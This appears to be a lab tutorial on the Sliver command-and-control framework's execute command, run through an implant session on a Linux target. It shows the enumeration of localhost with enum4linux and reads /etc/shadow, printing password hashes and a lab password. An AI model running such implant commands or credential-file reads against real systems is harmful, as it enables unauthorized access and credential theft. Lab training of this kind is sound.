Skip to main content

Using the Execute Command

Start up the Linux session with the implant created earlier. Once the session contacts the server, be sure to use the session.

While Sliver has a lot of built-in commands, it also includes an execute command which is used to run commands on the target host.

sliver > help execute

Execute a program on the remote system

Usage:
======
  execute [flags] command [arguments...]

Args:
=====
  command    string         command to execute
  arguments  string list    arguments to the command

Flags:
======
  -h, --help                    display help
  -S, --ignore-stderr           don't print STDERR output
  -X, --loot                    save output as loot
  -n, --name          string    name to assign loot (optional)
  -o, --output                  capture command output
  -P, --ppid          uint      parent process id (optional, Windows only) (default: 0)
  -s, --save                    save output to a file
  -E, --stderr        string    remote path to redirect STDERR to
  -O, --stdout        string    remote path to redirect STDOUT to
  -t, --timeout       int       command timeout in seconds (default: 60)
  -T, --token                   execute command with current token (windows only)

sliver >

Use the execute command to perform enumeration of the Linux target.

sliver (linsession) > execute -o enum4linux -o localhost

[*] Output:
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct  6 11:59:59 2024

 =========================================( Target Information )=========================================

Target ........... localhost
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =============================( Enumerating Workgroup/Domain on localhost )=============================


[E] Can't find workgroup/domain


 =====================================( Session Check on localhost )=====================================


[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

[*] Stderr:
nmblookup: /usr/local/lib/libjansson.so.4: no version information available (required by /usr/lib/x86_64-linux-gnu/samba/libcommon-auth-private-samba.so.0)
[!] Exited with status 1!

sliver (linsession) >

A similar example viewing the /etc/shadow file on the Linux target.

sliver (linsession) > execute -o cat /etc/shadow

[*] Output:
root:$y$j9T$zVVH4QMdrFXeZ.Kh8QZuv.$Csu0eotA0OrnarMR2bSHWuQfxytEG5yrx2G/uErgv18:20002:0:99999:7:::
daemon:*:19529:0:99999:7:::
bin:*:19529:0:99999:7:::
sys:*:19529:0:99999:7:::

📌 NOTE
No need to crack that hash. The password is P@ssw0rd

One thing to keep in mind when using the execute command is that there is a default 60 second timeout. If the command you are executing takes longer than that, then you will need to specify the additional time. This is accomplished with the -t <int> flag.

-t, --timeout       int       command timeout in seconds (default: 60)

In this example, I set the timeout to 120 seconds:

sliver (linsession) > execute -o -t 120 enum4linux -a localhost